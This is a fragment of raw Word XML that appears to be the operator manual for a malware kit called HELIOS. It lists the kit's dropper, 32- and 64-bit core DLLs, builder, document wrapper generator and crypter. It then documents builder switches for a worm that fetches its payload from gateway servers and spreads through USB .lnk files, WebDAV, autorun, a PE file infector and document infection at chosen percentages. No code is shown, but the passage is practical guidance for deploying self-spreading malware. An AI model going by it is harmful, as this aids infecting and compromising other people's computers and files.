            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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101" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wrapper Tracking [4]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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102" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wrapper Payload (Mercury) [5]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00CC038F" w:rsidRDefault="00CC038F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc347394103" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Return Codes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00F762A5" w:rsidRPr="00F762A5" w:rsidRDefault="00CC1DF7" w:rsidP="00551FAB">
          <w:pPr>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F762A5">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC038F" w:rsidRDefault="00CC038F" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F762A5" w:rsidRDefault="00961D7D" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc347394077"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Contained Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00961D7D" w:rsidRDefault="00961D7D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00961D7D" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The HELIOS package comes with the following files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>dropper.exe [The primary dropper code]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>core32.dll [The 32-bit image of HELIOS]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>core64.dll [The 64-bit image of HELIOS]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>builder.exe [The primary HELIOS builder]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>wrapper_skeleton.exe [The wrapper skeleton file]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>wrapper_generator.exe [The wrapper generator; or the wrapper builder]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KPCOE.exe [The KPCOE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>KPCOE_skeleton.exe [The KPCOE skeleton file]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>KPCOE.cfg [The KPCOE configuration for HELIOS]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>rebuild.bat [An easily configurable batch file]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Before HELIOS can be run, several other files are needed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">webdav_list.txt [A List specifying the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> servers]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002399E" w:rsidRDefault="0002399E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>gateway_list.txt [A list specifying the primary Corona gates]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F762A5" w:rsidRDefault="00F762A5" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc347394078"/>
      <w:r>
        <w:t>HELIOS Builder and Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00F762A5" w:rsidRDefault="00F762A5" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F762A5" w:rsidRDefault="00F762A5" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The HELIOS builder generates a </w:t>
      </w:r>
      <w:r w:rsidR="00961D7D">
        <w:t xml:space="preserve">Portable Executable (PE) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">containing the dropper, core DLLs, and a user-specified table used for configuring the run-time instance. The user must specify at least one gate for the builder to function. A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server list, on the other hand, is optional (FIXME). </w:t>
      </w:r>
      <w:r w:rsidR="00961D7D">
        <w:t>Furthermore, the builder requires additional user information on propagation patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc347394079"/>
      <w:r>
        <w:t>Builder Parameters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>The builder reads parameters statically, so the parameters cannot be mismatched (as in, keep the following format). Each parameter must be present.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>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-u</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Specifies the file containing the Gateway URL list. (String)</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When the worm replicates to a new system using Token</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 xml:space="preserve">Manipulation, the payload is downloaded from one of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the Gateways specified in this list.</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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>-d</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Specifies the file containing the WEBDAV URL list. (String)</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When the worm generates a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file inside the USB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 xml:space="preserve">drive, it will use the Gateways specified by the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list as WEBDAV hosts.</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-a</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Attack ID (Integer)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 xml:space="preserve">Allows the worm code to communicate with the Gateways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specified by the Gateway URL list.</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-w</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Campaign ID (Integer)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 xml:space="preserve">Allows the worm code to communicate with the Gateways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specified by the Gateway URL list.</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-o</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Output binary (String)</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The output binary</w:t>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be stored to the location </w:t>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00464B5B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pecified.</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-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Enables </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Boolean)</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-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Enables all USB Ops (Boolean)</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(NOTE: Either 1 or 2 must enabled)</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-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Enables the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Autorun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> generator (Boolean)</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-4</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Enables the date </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>appender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the USB Wrapper (Boolean)</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-5</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Enables RTO</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-6</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Enables the Wrapper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-7</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Enables the PE Infector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(NOTE: Either 3, 6 or 7 must be enabled)</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>PE Infector Switch (Integer)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If 0, the PE infector is completely disabled.</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 xml:space="preserve">An integer between 1-100 is the percentage (or likeliness)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that the PE infector will target a file.</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(1 means 1/100 chance, and 100 means always infect)</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-r</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Wrapper Infector Switch (Integer)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If 0, the Wrapper is completely disabled.</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An integer between 1-100 is the percentage (or likeliness)</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that the Wrapper will infect a document.</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(1 means 1/100 chance, and 100 means always infect)</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-t</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Any USB file accessed after n amount of days will be ignored.</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This includes PEs and Documents</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If 0, every file will be infected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
